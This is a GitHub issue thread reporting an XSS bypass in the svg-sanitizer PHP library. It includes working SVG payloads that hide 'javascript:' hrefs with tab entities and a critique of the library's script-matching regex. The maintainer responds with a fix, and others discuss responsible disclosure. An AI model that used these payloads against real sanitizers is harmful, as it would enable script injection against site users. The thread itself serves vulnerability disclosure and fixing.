search

darylldoyle / svg-sanitizer

A PHP SVG/XML Sanitizer
GNU General Public License v2.0
456 stars 68 forks source link

XSS bypass using entities and tab #31

Closed dinhbaouit closed 4 years ago

dinhbaouit commented 4 years ago

Using payload below to bypass XSS filter: 

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(document.domain)">
    <circle cx="0" cy="0" r="300"/>
  </a>
</svg>

Video POC: https://www.youtube.com/watch?v=MIAiX4gkp6U&feature=youtu.be

darylldoyle commented 4 years ago

Thanks @dinhbaouit

I'm currently working on a fix for this that I'll release later today!

darylldoyle commented 4 years ago

@dinhbaouit thanks again for bringing this to my attention! I've tagged the latest release with the updated fix for this and will proceed to get the plugins etc updated.

dinhbaouit commented 4 years ago

OK, Thanks sir

ohader commented 4 years ago

@dinhbaouit 🤦‍♀️ → https://en.wikipedia.org/wiki/Responsible_disclosure & https://cheatsheetseries.owasp.org/cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html

dinhbaouit commented 4 years ago

Sorry sir, I will delete it.

mbrodala commented 4 years ago

@darylldoyle You should add a section about how to get in touch for security issues to your README to prevent public reports like this.

dinhbaouit commented 4 years ago

Hi, I see the fix still be able to bypass new payload to bypass:

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascrip&#9;t:alert('0xd0ff9')">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg>

Why don't you use whitelist to sanitize like xlink:href?

dinhbaouit commented 4 years ago

This regex: const SCRIPT_REGEX = '/(?:\w+script|data)(?:\s)?:/xi'; doesn't safe, \s can put anywhere in "script" string like this: s\sc\sr\si\sp\st

darylldoyle commented 4 years ago

@dinhbaouit whilst you're correct, this does get through the sanitiser in a way, I'm struggling to get it to actually execute. The spacing in the middle of the javascript keyword, seems to stop browsers from picking up and executing the script:

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascrip    t:alert('0xd0ff9')">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg>

The above is what's left if you can show me a way to get this to execute in a browser, as the first bypass you posted did, then I'll be happy to look, otherwise, I'll leave this one alone as it's not causing any real issues.

dinhbaouit commented 4 years ago

POC for new version plugin wordpress 1.9.5 entities do not convert to raw data, it will be html encoded https://www.youtube.com/watch?v=hnQA2hc-4_k&feature=youtu.be